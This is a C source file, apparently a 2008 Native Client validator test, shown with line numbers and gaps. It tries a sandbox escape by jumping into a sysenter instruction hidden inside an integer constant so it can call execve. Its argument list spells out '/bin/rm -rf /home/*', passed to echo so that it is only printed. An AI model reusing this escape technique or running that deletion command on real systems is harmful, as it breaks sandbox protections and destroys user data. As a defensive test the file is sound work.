2 * Copyright 2008 The Native Client Authors. All rights reserved.
3 * Use of this source code is governed by a BSD-style license that can be
4 * found in the LICENSE file.
11 int TrustMe(int returnaddr1,
12 const char *path, char *const argv[], char *const envp[]) {
13 int immx = 0x0000340f;
14 int codeaddr = (int)TrustMe + 9;
16 // This code creates the machine state for the execve call, with
17 // little regard for preserving the sanity of the rest of the stack.
18 asm("mov $11, %eax"); // set syscall # for execve
19 asm("mov 28(%esp), %ebx"); // linux kernel wants args in registers: arg1
20 asm("mov 32(%esp), %ecx"); // arg2
21 asm("mov 36(%esp), %edx"); // arg3
22 asm("mov %esp, %ebp"); // save esp in ebp
23 asm("jmp *12(%ebp)"); // jump to overlapped instruction
24 // via address in local var codeaddr
27 char *const eargv[] = {"/bin/echo", "/bin/rm", "-rf", "/home/*", NULL};
28 int main(int argc, char *argv[]) {
29 TrustMe(-1, eargv[0], eargv, NULL);